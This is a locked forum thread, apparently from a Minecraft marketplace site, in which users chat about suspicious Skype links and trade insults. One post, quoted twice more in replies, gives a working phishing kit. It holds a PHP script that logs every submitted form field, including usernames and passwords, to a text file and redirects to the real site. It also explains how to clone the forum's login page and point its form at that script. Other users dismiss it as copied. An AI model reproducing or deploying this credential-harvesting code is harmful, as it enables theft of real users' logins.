Skype viruses.

Status
This thread has been locked.

jurhe d

starbeam
Supreme
Feedback score
77
Posts
1,653
Reactions
2,456
Resources
0
welp

fuhq u Kobe

also i clicked this over a month ago, and nothing has happened
 

Ekooc

We all make mistakes.
Banned
Feedback score
9
Posts
721
Reactions
332
Resources
0
Banned forever. Reason: Scamming (https://builtbybit.com/threads/ekooc-scam-report.183504/)

Ekooc

We all make mistakes.
Banned
Feedback score
9
Posts
721
Reactions
332
Resources
0
This has been around for like 3-4 years. Nothing new.
I just found out, I wasn't aware it has been about for a while.

I simply wanted to inform you lot encase it was new. Just being friendly ahah
 
Banned forever. Reason: Scamming (https://builtbybit.com/threads/ekooc-scam-report.183504/)

GlitchMakerHD

Feedback score
2
Posts
138
Reactions
65
Resources
0
Example:

it a bit of hacking in terms of Phishing the user can do it a few ways include running a script that logs cookies to there kali linux meta exploit so in terms msfconsole, that show what and who visited the link include sometimes there passwords easy done.

2nd is:

use the php script


PHP:
<?php
header ('Location: http://www.mc-market.org/');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Then you would create ^^ that as login.php

then copy mcm html front end

and change login html script out to

HTML:
<form action="login/login" method="post" class="xenForm eAuth" id="login" style="display:none">

where it outputs action="login/login" put the login.php and where it says method use GET :p Should create a log .txt file on web server. with there stored passwords , username.
 
Last edited:

spurkle

Premium
Feedback score
-2
Posts
450
Reactions
241
Resources
0
All the kids discussing on the computer security, and have no idea on how it really works. (facepalm).

No, You can't get infected from just visiting the link, unless you are stupid enough to fall for something else.

If it would work different way, then i'd be a millionaire, lol.
 

Ireland

kek
Supreme
Feedback score
1
Posts
956
Reactions
423
Resources
0
Example:

it a bit of hacking in terms of Phishing the user can do it a few ways include running a script that logs cookies to there kali linux meta exploit so in terms msfconsole, that show what and who visited the link include sometimes there passwords easy done.

2nd is:

use the php script


PHP:
<?php
header ('Location: http://www.mc-market.org/');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Then you would create ^^ that as login.php

then copy mcm html front end

and change login html script out to

HTML:
<form action="login/login" method="post" class="xenForm eAuth" id="login" style="display:none">

where it outputs action="login/login" put the login.php and where it says method use GET :p Should create a log .txt file on web server. with there stored passwords , username.
Please tell me you got this from a website and pasted it :eek:
 

spurkle

Premium
Feedback score
-2
Posts
450
Reactions
241
Resources
0
Example:

it a bit of hacking in terms of Phishing the user can do it a few ways include running a script that logs cookies to there kali linux meta exploit so in terms msfconsole, that show what and who visited the link include sometimes there passwords easy done.

2nd is:

use the php script


PHP:
<?php
header ('Location: http://www.mc-market.org/');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Then you would create ^^ that as login.php

then copy mcm html front end

and change login html script out to

HTML:
<form action="login/login" method="post" class="xenForm eAuth" id="login" style="display:none">

where it outputs action="login/login" put the login.php and where it says method use GET :p Should create a log .txt file on web server. with there stored passwords , username.
You have no fucking idea what you are talking about, don't ya?

Well good job on copying a phishing script that's all over the internet.
 

Ekooc

We all make mistakes.
Banned
Feedback score
9
Posts
721
Reactions
332
Resources
0
You have no fucking idea what you are talking about, don't ya?

Well good job on copying a phishing script that's all over the internet.
I mean considering he's a CEH i'd say otherwise.

What's the point making fresh code for an example that you can google?
 
Banned forever. Reason: Scamming (https://builtbybit.com/threads/ekooc-scam-report.183504/)

spurkle

Premium
Feedback score
-2
Posts
450
Reactions
241
Resources
0
I mean considering he's a CEH i'd say otherwise.

What's the point making fresh code for an example that you can google?
'CEH' - Hes like 15 years old, lol. (Like majority of members on this forum)

 
Status
This thread has been locked.
Top